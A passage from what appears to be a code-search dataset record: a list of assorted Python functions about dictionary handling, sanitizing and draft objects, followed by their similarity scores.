\"status\")) or key == \"blocks\":\n continue # message blocks are too complex to sanitize, drop them\n\n if key in (\"topic\", \"purpose\"):\n if isinstance(value, dict):\n value.update(value=placeholder)\n elif isinstance(value, str):\n value = 
placeholder\n if key == \"previous_names\":\n value = [placeholder] * len(value)\n\n if key == \"text\":\n value = re.sub(regex, lambda match: (\n \"X\" * len(match[\"word\"])), value)\n\n if key in (\"files\", \"attachments\"):\n key, value = f\"{key}_count\", len(value)\n\n result[key] = value\n\n return result", "def _cleanse_dict(original):\n return {k: v for k, v in original.items() if \"_pass\" not in k}", "def get_draft_revisions(self, object_id):\n content_type = ContentType.objects.get_for_model(self.model)\n return Revision.objects.filter(\n version__object_id=object_id, \n version__content_type=content_type,\n easypublishermetadata__status='draft',\n easypublishermetadata__language=get_language()\n ).select_related().distinct()", "def collect_draft_pick(team_dict):\n team_dict['draft_pick'] = []\n pick_list = DraftPick.objects.filter(owner=team_dict['team'].franchise.id,\n year=team_dict['team'].year)\n for p in pick_list:\n number = ((p.round - 1) * 16) + p.order\n dft_pick = {\n 'pick': p,\n 'number': number,\n }\n team_dict['draft_pick'].append(dft_pick)\n return team_dict", "def denormalize_entity(in_dict):\n out_dict = in_dict.copy()\n if 'id' in list(in_dict):\n out_dict['pk'] = in_dict['id']\n del out_dict['id']\n if 'start_time' in list(in_dict):\n # if not a datetime object, throw error\n if in_dict['start_time'] and not isinstance(in_dict['start_time'],\n datetime):\n raise IncorrectType()\n out_dict['start_time'] = \\\n in_dict['start_time'].strftime('%Y-%m-%dT%H:%M:%S.%fZ') \\\n if in_dict['start_time'] else None\n if 'end_time' in list(in_dict):\n # if not a datetime object, throw error\n if in_dict['end_time'] and not isinstance(in_dict['end_time'],\n datetime):\n raise IncorrectType()\n out_dict['end_time'] = \\\n in_dict['end_time'].strftime('%Y-%m-%dT%H:%M:%S.%fZ') \\\n if in_dict['end_time'] else None\n if 'created_at' in list(in_dict):\n # if not a datetime object, throw error\n if not isinstance(in_dict['created_at'], datetime):\n raise IncorrectType()\n out_dict['created_at'] = in_dict['created_at'].strftime(\n '%Y-%m-%dT%H:%M:%S.%fZ')\n if 'updated_at' in list(in_dict):\n # if not a datetime object, throw error\n if not isinstance(in_dict['updated_at'], datetime):\n raise IncorrectType()\n out_dict['updated_at'] = in_dict['updated_at'].strftime(\n '%Y-%m-%dT%H:%M:%S.%fZ')\n return out_dict", "def format_dict(\n d: typing.Mapping[TTextType, TTextType]\n) -> typing.Iterator[TViewLine]:\n\n return format_pairs(d.items())", "def put(self, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n self.validate_input(d, draft_id)\n self.process_input(d, draft_id)\n d.save()", "def from_dict(cls, dictionary):\n normalised = cls.normalise_dict(dictionary)\n return cls.from_normalised_dict(normalised)", "def patch(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('patch',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def get_draft_by_id(request, draft_id):\n\n for draft in request.session[\"drafts\"]:\n if draft[\"id\"] == draft_id:\n # Found a valid draft, return it\n return draft\n\n return None # Otherwise return None.", "def from_dict(cls, dikt) -> 'PartialDifferenceQuotientInput':\n return util.deserialize_model(dikt, cls)", "def _render_dict(input_dict: Dict[str, Any]) -> Dict[str, Any]:\n output_dict = {}\n\n for key, value in input_dict.items():\n if isinstance(value, str):\n new_value = string.Template(value).substitute(_mapping)\n output_dict[key] = new_value\n elif isinstance(value, dict):\n 
output_dict[key] = _render_dict(value) # type: ignore\n else:\n output_dict[key] = value\n\n return output_dict", "def from_dict(cls, dikt) -> 'Debt':\n return util.deserialize_model(dikt, cls)", "def drafts(self):\n if self._drafts is None:\n if self._initialize_drafts():\n self._save_drafts()\n return self._drafts", "def __cleanState__(self, stateDict):\n for k in list(stateDict.keys()):\n if k.startswith('_'):\n stateDict.pop(k)\n return stateDict", "def normalise_dict(dictionary):\n # Convert all keys to lowercase (so that we can check if certain keys exist)\n # Values are left untouched until the object is constructed (e.g. in case of None)\n dictionary = {key.lower(): value for key, value in dictionary.items()}\n # Find the cvarsort\n try:\n dictionary['cvarsort'] = dictionary['cvarsort'].lower()\n except KeyError:\n raise PydmrsValueError('Sortinfo must have cvarsort')\n # Correct cvarsort if features are evidence for 'x' or 'e':\n if dictionary['cvarsort'] not in 'ex' and len(dictionary) > 1:\n if any(key in dictionary for key in EventSortinfo.features): # event evidence\n dictionary['cvarsort'] = 'e'\n elif any(key in dictionary for key in InstanceSortinfo.features): # instance evidence\n dictionary['cvarsort'] = 'x'\n return dictionary", "def parse(self) -> Dictionary:\n self.parsed_dictionary = dictionary = Dictionary()\n state = State.pre_signature\n for lineno, line in self.line_iter:\n lineno += 1\n line = decomment_and_normalize(line)\n if line == \"\": continue\n parsed = False\n expected_lines = State.expected_lines(state)\n for t in expected_lines:\n parsed, state = t.parse_line(state, dictionary, line, lineno)\n if parsed: break\n if not parsed:\n raise DictionaryParseError(lineno, expected_lines, self.source)\n if State.is_not_final(state):\n raise DictionaryParseError(lineno + 1, expected_lines, self.source)\n try:\n del dictionary._last_article\n del dictionary._last_definition\n del dictionary._last_example\n del dictionary._last_idiom\n except AttributeError:\n pass\n return dictionary", "def post(self):\n try:\n draft_project_dto = DraftProjectDTO(request.get_json())\n draft_project_dto.user_id = token_auth.current_user()\n draft_project_dto.validate()\n except DataError as e:\n current_app.logger.error(f\"error validating request: {str(e)}\")\n return {\"Error\": \"Unable to create project\", \"SubCode\": \"InvalidData\"}, 400\n\n try:\n draft_project_id = ProjectAdminService.create_draft_project(\n draft_project_dto\n )\n return {\"projectId\": draft_project_id}, 201\n except ProjectAdminServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n except (InvalidGeoJson, InvalidData) as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def validate(self, data):\n draft_group_id = data['draft_group']\n if draft_group_id is None:\n raise serializers.ValidationError(\"invalid draft_group id\")\n try:\n draftgroup.models.DraftGroup.objects.get(pk=draft_group_id)\n except draftgroup.models.DraftGroup.DoesNotExist:\n raise serializers.ValidationError('invalid draft_group id')\n\n return data", "def _dictRoundTripNormalize(self, treedict):\n for key, value in list(treedict.items()):\n if isinstance(value, dict):\n self._dictRoundTripNormalize(value)\n\n # Expand treedict[(\"group\", \"attr_name\")]\n # to treedict[\"group\"][\"attr_name\"]\n for key, value in list(treedict.items()):\n if not isinstance(key, tuple):\n continue\n # Put the attribute inside the group\n grpname, attr = 
key\n if not grpname:\n continue\n group = treedict.setdefault(grpname, dict())\n if isinstance(group, dict):\n del treedict[key]\n group[(\"\", attr)] = value", "def create_deltas(self, tensor_dict):\n\n if not self.send_model_deltas:\n raise ValueError(\"Should not be creating deltas when not sending deltas.\")\n base_tensors = self.base_for_deltas[\"tensor_dict\"]\n base_version = self.base_for_deltas[\"version\"]\n if base_tensors is None:\n raise ValueError(\"Attempting to create deltas when no base tensors are known.\")\n elif set(base_tensors.keys()) != set(tensor_dict.keys()):\n raise ValueError(\"Attempting to convert to deltas when base tensor names do not match ones to convert.\")\n else:\n deltas = {\"tensor_dict\": {key: (tensor_dict[key] - base_tensors[key]) for key in base_tensors},\n \"delta_from_version\": base_version}\n return deltas", "def from_dict_dict(cls, dict_dict):\n return {k: cls.from_dict(v) for k, v in dict_dict.items()}", "def original_dict(self):\n return self.obj.__dict__", "def get(self,\n draft_id,\n ):\n return self._invoke('get',\n {\n 'draft_id': draft_id,\n })", "def safe_dict(d: dict) -> dict:\n return {k: v for k, v in d.items() if not any(chunk in k for chunk in [\"token\"])}", "def get_or_create_bundle_draft(bundle_uuid, draft_name):\n bundle = get_bundle(bundle_uuid)\n try:\n return get_draft(bundle.drafts[draft_name]) # pylint: disable=unsubscriptable-object\n except KeyError:\n # The draft doesn't exist yet, so create it:\n response = api_request('post', api_url('drafts'), json={\n \"bundle_uuid\": str(bundle_uuid),\n \"name\": draft_name,\n })\n # The result of creating a draft doesn't include all the fields we want, so retrieve it now:\n return get_draft(UUID(response[\"uuid\"]))", "def from_dict(cls, d):\n return cls(d[\"sequence\"], immutable_bounds=d[\"immutable_bounds\"])", "def _to_save_dict(self, d: dict) -> dict:\n return _to_save_dict(d)", "def upgrade_state_dict(self, state_dict):\n return state_dict", "def upgrade_state_dict(self, state_dict):\n return state_dict", "def normalise_workflow(workflow_dict):\n normalise_process(workflow_dict)\n if not 'steps' in workflow_dict:\n exit_perm_fail(\"No steps in Workflow\")\n\n if isinstance(workflow_dict['steps'], dict):\n new_steps = []\n for step_id, step in workflow_dict['steps'].items():\n step['id'] = step_id\n new_steps.append(step)\n workflow_dict['steps'] = new_steps\n\n for step in workflow_dict['steps']:\n if 'in' in step:\n if isinstance(step['in'], dict):\n new_in = []\n for key, value in step['in'].items():\n if isinstance(value, str):\n new_in.append({'id': key, 'source': value})\n elif isinstance(value, dict):\n value['id'] = key\n new_in.append(value)\n step['in'] = new_in\n\n if 'out' in step:\n if not isinstance(step['out'], list):\n exit_perm_fail(\"The out attribute of a workflow step must be an array\")\n for i, output in enumerate(step['out']):\n if isinstance(output, str):\n step['out'][i] = {'id': output}", "def _get_draft_message(draft):\n return HttpTextResponse(draft.text if draft else '')", "def from_dict(cls, dikt) -> 'Body':\n return util.deserialize_model(dikt, cls)", "def get_safe_dict(target: dict) -> dict:\n return_value = {}\n for k in target:\n return_value[k] = cleanse_value(k, target.get(k))\n return return_value", "def convert_to_pydantic(dict_object: Dict) -> ConversationIDModel:\n return ConversationIDModel.parse_obj(dict_object)", "def from_dict(cls, dikt) -> 'CardholderData':\n return util.deserialize_model(dikt, cls)", "def from_dict(cls, dikt) -> 
'Body':\n return deserialize_model(dikt, cls)", "def deep_normalize(d):\n if 'sudsobject' in str(d.__class__):\n d = deep_normalize(dict(d))\n elif isinstance(d, dict):\n for k,v in d.iteritems():\n if 'sudsobject' in str(v.__class__):\n #print k, v, '%s' % v.__class__\n r = deep_normalize(dict(v))\n d[k] = r\n elif isinstance(v, dict):\n r = deep_normalize(v)\n d[k] = r\n elif isinstance(v, (list, tuple, )):\n d[k] = [deep_normalize(i) for i in v]\n elif isinstance(v, datetime):\n # per problemi di permessi sugli oggetti datetime trasformo\n # in DateTime di Zope\n d[k] = DateTime(v.isoformat())\n elif isinstance(d, (list, tuple, )):\n d = [deep_normalize(i) for i in d]\n\n return d", "def transform(dict_: dict, typed_dict: dict, substring_to_type: Optional[List] = None) -> dict:\n\n if substring_to_type:\n for item in substring_to_type:\n # Initialize substring values to convert into dictionary type\n substring = item['substring']\n field = item['field']\n type_ = item['type']\n\n # Find keys that match the substring and pull them into a new dictionary\n sub_dict = dict((key.strip(substring), dict_.pop(key))\n for key in set(dict_.keys()) if substring in key)\n\n # Transform the dictionary into the dictionary type provided\n dict_[field] = transform(sub_dict, type_)\n\n fields = typed_dict.__annotations__\n return {name: fields[name](value) for name, value in dict_.items() if name in fields.keys()}", "def copy_dict(source_dict, diffs):\n result = dict(source_dict)\n result.update(diffs)\n return result", "def form_valid(self, form):\n\n draft_pk = self.request.POST.get(\"pub_draft_pk\", \"\")\n publishing_draft = draft_pk.isdigit()\n\n if (not publishing_draft) and (self.topic.exists and self.topic.is_banned):\n # Cannot check is_banned before checking its existence.\n notifications.error(self.request, _(\"we couldn't handle your request. try again later.\"))\n return self.form_invalid(form)\n\n status = self.request.user.entry_publishable_status\n\n if status is not None:\n notifications.error(self.request, status, extra_tags=\"persistent\")\n if publishing_draft:\n return redirect(reverse(\"entry_update\", kwargs={\"pk\": int(draft_pk)}))\n return self.form_invalid(form)\n\n if publishing_draft:\n try:\n entry = Entry.objects_all.get(\n pk=int(draft_pk), is_draft=True, author=self.request.user, topic__is_banned=False\n )\n entry.content = form.cleaned_data[\"content\"]\n entry.is_draft = False\n entry.date_created = timezone.now()\n entry.date_edited = None\n except Entry.DoesNotExist:\n notifications.error(self.request, _(\"we couldn't handle your request. 
try again later.\"))\n return self.form_invalid(form)\n else:\n # Creating a brand new entry.\n entry = form.save(commit=False)\n entry.author = self.request.user\n\n if self.topic.exists:\n entry.topic = self.topic\n else:\n if not self.topic.valid:\n notifications.error(self.request, _(\"curses to such a topic anyway.\"), extra_tags=\"persistent\")\n return self.form_invalid(form)\n\n entry.topic = Topic.objects.create_topic(title=self.topic.title)\n\n entry.save()\n notifications.info(self.request, _(\"the entry was successfully launched into stratosphere\"))\n return redirect(reverse(\"entry-permalink\", kwargs={\"entry_id\": entry.id}))", "def get_draft(self, draft_number: Optional[int] = None) -> Draft:\n if draft_number is None:\n self._status.check_authority_for_draft()\n draft_number = self._status.draft_number\n\n if not draft_number:\n raise TypeError(\"The given draft number is illegal\")\n\n for draft in self.list_drafts():\n if draft_number == draft.number:\n return draft\n\n raise ResourceNotExistError(resource=\"draft\", identification=draft_number)", "def update(cls, dto: dict):\n entity = cls.from_dict(dto)\n try:\n valid_entity = cls.find_by_id(dto[\"id\"])\n except KeyError as e:\n raise AppException(\"Can't find key {}\".format(e))\n\n if not valid_entity:\n return None\n\n # validate creation your creation.\n entity.creation_validation()\n\n # Copy all attributes from entity to valid_entity.\n valid_entity << entity\n\n return valid_entity", "def test_sanitize() -> None:\n # a test dict with many embedded numbered list\n # but also an already existing list\n test = {\n \"a\": {\"0\": \"b\", \"1\": \"c\"},\n \"d\": {\"e\": {\"0\": \"f\", \"1\": \"g\"}, \"h\": \"i\"},\n \"j\": [\"k\", \"l\"],\n }\n\n # the sanitize version of this\n result = {\n \"a\": [\"b\", \"c\"],\n \"d\": {\"e\": [\"f\", \"g\"], \"h\": \"i\"},\n \"j\": [\"k\", \"l\"],\n }\n\n assert Translator.sanitize(test) == result\n\n return", "def TranslateDict(d):\n\n return dict(TranslateKeyValue(k, v) for k, v in d.iteritems())", "def convert_to_pydantic(dict_object: Dict) -> MessageModel:\n return MessageModel.parse_obj(dict_object)", "def convert_to_pydantic(dict_object: Dict) -> MessageModel:\n return MessageModel.parse_obj(dict_object)", "def validate_dict(data_dict, entity):\r\n fields = []\r\n for key, value in data_dict.items():\r\n if not value:\r\n fields.append(key)\r\n continue\r\n if len(fields) > 0:\r\n return provide_field_value(entity, fields)\r\n elif key == hqAddKey:\r\n status = validate_hqadd(value)\r\n if not status == ok_str:\r\n return status\r\n elif key == logoUrlKey:\r\n status = validate_logourl(value)\r\n if not status == ok_str:\r\n return status\r\n elif key == type_key:\r\n status = validate_officeType(value)\r\n if not status == ok_str:\r\n return status\r\n elif key == name_key:\r\n status = None\r\n if entity == party_key:\r\n status = validate_partyname(value)\r\n elif entity == office_key:\r\n status = validate_officeName(value)\r\n if not status == ok_str:\r\n return status\r\n if fields:\r\n return provide_field_value(entity, fields)\r\n return ok_str", "def safe_dict(d):\r\n if isinstance(d, dict):\r\n return dict([(k.encode('utf-8'), safe_dict(v)) for k, v in d.iteritems()])\r\n elif isinstance(d, list):\r\n return [safe_dict(x) for x in d]\r\n else:\r\n return d", "def _check_typed_dict(self) -> PossibleResult[T]:\n # pylint: disable=unidiomatic-typecheck\n if type(self.constructor) == _TypedDictMeta:\n # pylint: enable=unidiomatic-typecheck\n if not 
isinstance(self.obj, dict):\n raise DeserializeError(\n dict, self.obj, self.new_depth, self.key\n )\n return {\n name: Deserialize(\n obj=self.obj.get(name, UNDEFINED),\n constructor=_type,\n depth=self.new_depth,\n convert_primitives=self.convert_primitives,\n key=name,\n ).run()\n for name, _type in get_type_hints(self.constructor).items()\n } # type: ignore\n return NO_RESULT", "def _flatten_dict(self, d: Mapping[str, Any]) -> Dict[str, Any]:\n nested = {k for k, v in d.items() if isinstance(v, (Mapping, Configuration))}\n if self._lowercase:\n result = {\n k.lower() + \".\" + ki: vi\n for k in nested\n for ki, vi in self._flatten_dict(d[k]).items()\n }\n result.update(\n (k.lower(), v)\n for k, v in d.items()\n if not isinstance(v, (Mapping, Configuration))\n )\n else:\n result = {\n k + \".\" + ki: vi\n for k in nested\n for ki, vi in self._flatten_dict(d[k]).items()\n }\n result.update(\n (k, v)\n for k, v in d.items()\n if not isinstance(v, (Mapping, Configuration))\n )\n return result", "def clean_dict(target_dict, whitelist=None):\n assert isinstance(target_dict, dict)\n return {\n ustr(k).strip(): ustr(v).strip()\n for k, v in target_dict.items()\n if v not in (None, Ellipsis, [], (), \"\")\n and (not whitelist or k in whitelist)\n }", "def get_latest_draft(self, object_id):\n latest_revision = self.get_latest_draft_revision(object_id)\n return latest_revision", "def update(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('update',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def from_dict(cls, d):\n s = cls()\n s.update_from_dict(d)\n return s", "def from_dict(cls, dikt) -> 'BaseEventBody':\n return util.deserialize_model(dikt, cls)", "def apply_RBDM_defect_dict(defects_dict: dict, \r\n valences_oxi_states: dict, \r\n incar_settings: dict = default_incar_settings, \r\n dict_number_electrons_user : dict = None,\r\n bdm_increment: float = 0.1,\r\n bdm_distortions: list = None,\r\n std_dev: float = 0.25,\r\n distorted_elements: dict = None,\r\n bdm_type: str= \"BDM\",\r\n potcar_settings: dict = None,\r\n write_files: bool = True,\r\n verbose: bool = False,\r\n ):\r\n vasp_defect_inputs = vasp_input.prepare_vasp_defect_inputs(deepcopy(defects_dict))\r\n dict_defects = {} # dict to store BDM distortions for all defects\r\n if not bdm_distortions:\r\n bdm_distortions = list(np.around(np.arange(-0.6, 0.601, bdm_increment), decimals=3)) #[i/100 for i in range(-60, 60.1, int(bdm_increment*100) ]\r\n bdm_metadata = {\"BDM_parameters\": {\"BDM_increment\": bdm_increment,\r\n \"BDM_distortions\": bdm_distortions,\r\n \"rattle_std_dev\": std_dev},\r\n \"defects\": {},\r\n } # dict with BDM parameters, useful for posterior analysis\r\n \r\n print(f\"Applying BDM... Will rattle with std dev of {std_dev} A \\n\")\r\n \r\n for defect_type in list(defects_dict.keys()): # loop for vacancies, antisites, interstitials\r\n for defect in defects_dict[defect_type]: # loop for each defect in dict\r\n \r\n defect_name = defect[\"name\"] # name without charge state\r\n bulk_supercell_site = defect[\"bulk_supercell_site\"]\r\n if distorted_elements: # read the elements to distort\r\n try:\r\n distorted_element = distorted_elements[defect_name]\r\n except KeyError:\r\n print(f\"Problem reading the keys in distorted_elements. 
Are they the correct defect names (without charge states)?\")\r\n distorted_element = None\r\n else: \r\n distorted_element = None\r\n \r\n if not dict_number_electrons_user : # if not given, BDM will calculate the number of extra/missing e- of defect\r\n number_electrons = calc_number_electrons(defect, valences_oxi_states) \r\n else:\r\n number_electrons = dict_number_electrons_user[defect_name]\r\n \r\n dict_defects[defect_name] = {}\r\n bdm_metadata[\"defects\"][defect_name] = {\"unique_site\" : list(bulk_supercell_site.frac_coords), \r\n \"charges\": {},\r\n }\r\n \r\n print(\"\\nDefect:\", defect_name)\r\n if number_electrons < 0 :\r\n print(f\"Number of extra electrons in neutral state: {number_electrons}\")\r\n elif number_electrons >= 0 :\r\n print(f\"Number of missing electrons in neutral state: {number_electrons}\")\r\n \r\n for charge in defect[\"charges\"]:\r\n \r\n poscar_comment = vasp_defect_inputs[f\"{defect_name}_{charge}\"][\"POSCAR Comment\"]\r\n charged_defect = {}\r\n \r\n # Entry for the unperturbed defect to compare\r\n charged_defect[\"Unperturbed_Defect\"] = deepcopy(vasp_defect_inputs[f\"{defect_name}_{charge}\"])\r\n \r\n # Generate perturbed structures\r\n # Calculate extra/missing e- accounting for the charge state of the defect \r\n num_electrons_charged_defect = number_electrons + charge # negative if extra e-, positive if missing e-\r\n num_nearest_neighbours = calc_number_neighbours(num_electrons_charged_defect) # Number of distorted neighbours for each charge state\r\n \r\n \r\n print(f\"\\nDefect {defect_name} in charge state: {charge}. Number of distorted neighbours: {num_nearest_neighbours}\")\r\n distorted_structures = apply_distortions(defect, \r\n num_nearest_neighbours, \r\n bdm_distortions,\r\n std_dev,\r\n distorted_element,\r\n verbose = verbose,\r\n )\r\n bdm_metadata[\"defects\"][defect_name][\"defect_index\"] = distorted_structures[\"BDM_parameters\"][\"defect_index\"] # store site number of defect\r\n bdm_metadata[\"defects\"][defect_name][\"charges\"].update({int(charge): \r\n {\"number_neighbours\": num_nearest_neighbours,\r\n \"distorted_atoms\" : distorted_structures[\"BDM_parameters\"][\"distorted_atoms\"],\r\n } \r\n } \r\n ) # store BDM parameters used for latter analysis\r\n \r\n \r\n for key_distortion, struct in distorted_structures[\"Distortions\"].items():\r\n poscar_comment = key_distortion.split(\"Distortion\")[0] + \"_\" + vasp_defect_inputs[f\"{defect_name}_{charge}\"][\"POSCAR Comment\"] + \"__num_neighbours=\" + str(num_nearest_neighbours)\r\n charged_defect[key_distortion] = update_struct_defect_dict(vasp_defect_inputs[f\"{defect_name}_{charge}\"],\r\n struct, \r\n poscar_comment,\r\n )\r\n \r\n dict_defects[defect_name][f\"{defect_name}_{charge}\"] = charged_defect # add charged defect entry to dict\r\n if write_files :\r\n create_vasp_input( f\"{defect_name}_{charge}\", \r\n charged_defect, \r\n incar_settings = incar_settings,\r\n potcar_settings = potcar_settings,\r\n bdm_type = bdm_type,\r\n )\r\n print() \r\n if verbose: print(\"________________________________________________________\") # output easier to read\r\n \r\n with open('BDM_metadata.json', 'w') as convert_file:\r\n convert_file.write(json.dumps(bdm_metadata))\r\n return dict_defects", "def wrap_draft(item):\r\n setattr(item, 'is_draft', item.location.revision == DRAFT)\r\n item.location = item.location.replace(revision=None)\r\n return item", "def update_workflow_from_dict(\n self,\n workflow_dict,\n workflow_id=None,\n validate=True\n ):\n valid_def = {}\n 
if validate:\n valid_def = Definition.validate_workflow(workflow_dict)\n if valid_def is False:\n Log.an().error(\n 'invalid workflow:\\n%s', yaml.dump(workflow_dict)\n )\n return False\n\n else:\n valid_def = workflow_dict\n\n # insert workflow_id into dict if provided\n if workflow_id:\n valid_def['workflow_id'] = workflow_id\n\n # make sure steps of workflow are valid, update app IDs\n if not self.synchronize_workflow_with_db(valid_def):\n Log.an().error(\n 'cannot synchronize workflow with data source: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # update workflow record\n if not self.update_workflow(\n valid_def['workflow_id'],\n {\n 'name': valid_def['name'],\n 'description': valid_def['description'],\n 'username': valid_def['username'],\n 'git': valid_def['git'],\n 'inputs': json.dumps(valid_def['inputs']),\n 'parameters': json.dumps(valid_def['parameters']),\n 'final_output': json.dumps(valid_def['final_output']),\n 'apps': json.dumps(valid_def['apps']),\n 'public': valid_def['public'],\n 'enable': valid_def['enable'],\n 'test': valid_def['test'],\n 'version': valid_def['version']\n }\n ):\n Log.an().error(\n 'cannot update workflow: workflow_id=%s',\n valid_def['workflow_id']\n )\n return False\n\n # update steps, create map of steps\n step_name2id = self.update_workflow_steps_from_dict(valid_def)\n if not step_name2id:\n Log.an().error(\n 'cannot update workflow steps: workflow_name=%s',\n valid_def['name']\n )\n return False\n\n # delete dependencies\n if not self.delete_depend_by_workflow_id(valid_def['workflow_id']):\n Log.an().error(\n 'cannot delete step dependencies for workflow: workflow_id=%s',\n valid_def['workflow_id']\n )\n return False\n\n # insert dependency records\n if not self.import_step_depends_from_dict(valid_def, step_name2id):\n Log.an().error(\n 'cannot import step dependencies for workflow: workflow_id=%s',\n valid_def['workflow_id']\n )\n return False\n\n return True", "def from_dict(cls, dikt) -> 'ProfessorWeek':\n return util.deserialize_model(dikt, cls)" ]
[ "0.56550765", "0.56206477", "0.5450413", "0.52529806", "0.52475804", "0.5194902", "0.51102144", "0.51091665", "0.50821674", "0.5033902", "0.5002", "0.49568045", "0.4842201", "0.48251075", "0.48187992", "0.48105076", "0.48069793", "0.47712836", "0.47657195", "0.47256124", "0.47020632", "0.46927628", "0.46636012", "0.465873", "0.46474317", "0.4644899", "0.46396995", "0.46204132", "0.46197772", "0.46022105", "0.4590394", "0.45882997", "0.4570402", "0.45645434", "0.45569757", "0.45423365", "0.45344472", "0.45344386", "0.4529503", "0.45263666", "0.4524855", "0.4524205", "0.45212", "0.45167407", "0.45116678", "0.45097762", "0.44997916", "0.44922465", "0.44872132", "0.44863003", "0.44796193", "0.4446491", "0.443559", "0.44345418", "0.44287968", "0.44269907", "0.44193724", "0.44190064", "0.4417166", "0.44148546", "0.4411501", "0.44058168", "0.43954048", "0.43934214", "0.43931937", "0.43891412", "0.43722478", "0.43661767", "0.43593398", "0.43593398", "0.43524125", "0.43489859", "0.43382394", "0.43369317", "0.43343255", "0.4328387", "0.43279332", "0.4325641", "0.4322892", "0.43227348", "0.43122837", "0.43086475", "0.43022627", "0.42992407", "0.42967036", "0.42800888", "0.42800888", "0.4277448", "0.42762", "0.42755184", "0.42619875", "0.42594016", "0.42532587", "0.42503288", "0.42473477", "0.42447817", "0.42428613", "0.4240886", "0.42404342", "0.42339388" ]
0.7376656
0
Create drafts in bulk for a given user based on the draft dicts. Since, currently, the only place this method is used (apart from tests) is the create_draft view, we assume that the draft_dicts are syntactically valid (i.e. they satisfy the draft_dict_validator).
def do_create_drafts(draft_dicts: List[Dict[str, Any]], user_profile: UserProfile) -> List[Draft]:
    draft_objects = []
    for draft_dict in draft_dicts:
        valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)
        draft_objects.append(
            Draft(
                user_profile=user_profile,
                recipient_id=valid_draft_dict["recipient_id"],
                topic=valid_draft_dict["topic"],
                content=valid_draft_dict["content"],
                last_edit_time=valid_draft_dict["last_edit_time"],
            )
        )

    created_draft_objects = Draft.objects.bulk_create(draft_objects)

    event = {
        "type": "drafts",
        "op": "add",
        "drafts": [draft.to_dict() for draft in created_draft_objects],
    }
    send_event(user_profile.realm, event, [user_profile.id])

    return created_draft_objects
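A minimal usage sketch for the function above, assuming Zulip's module layout (the zerver.lib.drafts and zerver.models import paths, and the get_user_profile_by_email helper, are assumptions) and a hypothetical user and stream ID; the draft dict keys ("type", "to", "topic", "content", "timestamp") follow further_validated_draft_dict:

from typing import Any, Dict, List

from zerver.lib.drafts import do_create_drafts  # assumed import path
from zerver.models import get_user_profile_by_email  # assumed helper

# Hypothetical user; any UserProfile instance works here.
user_profile = get_user_profile_by_email("hamlet@example.com")

# One stream draft; for stream drafts, "to" holds exactly one stream ID.
draft_dicts: List[Dict[str, Any]] = [
    {
        "type": "stream",
        "to": [1],  # hypothetical stream ID the user can access
        "topic": "bulk drafts",
        "content": "A draft synced from another client.",
        "timestamp": 1595479019.0,
    }
]

created = do_create_drafts(draft_dicts, user_profile)
print([draft.id for draft in created])  # PKs assigned by bulk_create on PostgreSQL

Each Draft is persisted in a single bulk_create query, and one "drafts"/"add" event is sent to the owning user's clients.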
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_draft(auth, subject, body, addresses, user_id, cc_addresses=[], attachments_list=None):\r\n data = {}\r\n data['Subject'] = subject\r\n data['Body'] = {}\r\n data['Body']['ContentType'] = 'HTML'\r\n data['Body']['Content'] = body\r\n data['ToRecipients'] = [{'EmailAddress': {'Address': addr}} for addr in addresses]\r\n data['ccRecipients'] = [{'EmailAddress': {'Address': addr}} for addr in cc_addresses]\r\n if attachments_list is not None:\r\n data['Attachments'] = attachments_list\r\n\r\n params = json.dumps(data).encode('utf8')\r\n\r\n url = \"{api_url}/{user_id}/messages\".format(api_url=API_URL, user_id=user_id)\r\n\r\n headers = {\r\n 'Content-Type': 'application/json',\r\n 'Authorization': 'Bearer {}'.format(auth.access_token)\r\n }\r\n req = urllib.request.Request(url, params, headers)\r\n try:\r\n resp = urllib.request.urlopen(req)\r\n resp_data = json.load(resp)\r\n\r\n logging.getLogger(__name__).info(\"Draft created\")\r\n\r\n return resp_data['id']\r\n except urllib.error.HTTPError as err:\r\n raise AzureError(err)", "def test_create_draft_with_multiple_requests(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n draft_1 = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(draft_1)\r\n\r\n # Now check that when a user sends request to create a draft when there is already a draft version then\r\n # user gets that already created draft instead of getting 'DuplicateItemError' exception.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n draft_2 = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(draft_2)\r\n self.assertEqual(draft_1, draft_2)", "def further_validated_draft_dict(\n draft_dict: Dict[str, Any], user_profile: UserProfile\n) -> Dict[str, Any]:\n\n content = normalize_body(draft_dict[\"content\"])\n\n timestamp = draft_dict.get(\"timestamp\", time.time())\n timestamp = round(timestamp, 6)\n if timestamp < 0:\n # While it's not exactly an invalid timestamp, it's not something\n # we want to allow either.\n raise JsonableError(_(\"Timestamp must not be negative.\"))\n last_edit_time = timestamp_to_datetime(timestamp)\n\n topic = \"\"\n recipient_id = None\n to = draft_dict[\"to\"]\n if draft_dict[\"type\"] == \"stream\":\n topic = truncate_topic(draft_dict[\"topic\"])\n if \"\\0\" in topic:\n raise JsonableError(_(\"Topic must not contain null bytes\"))\n if len(to) != 1:\n raise JsonableError(_(\"Must specify exactly 1 stream ID for stream messages\"))\n stream, sub = access_stream_by_id(user_profile, to[0])\n recipient_id = stream.recipient_id\n elif draft_dict[\"type\"] == \"private\" and len(to) != 0:\n to_users = get_user_profiles_by_ids(set(to), user_profile.realm)\n try:\n recipient_id = recipient_for_user_profiles(to_users, False, None, user_profile).id\n except ValidationError as 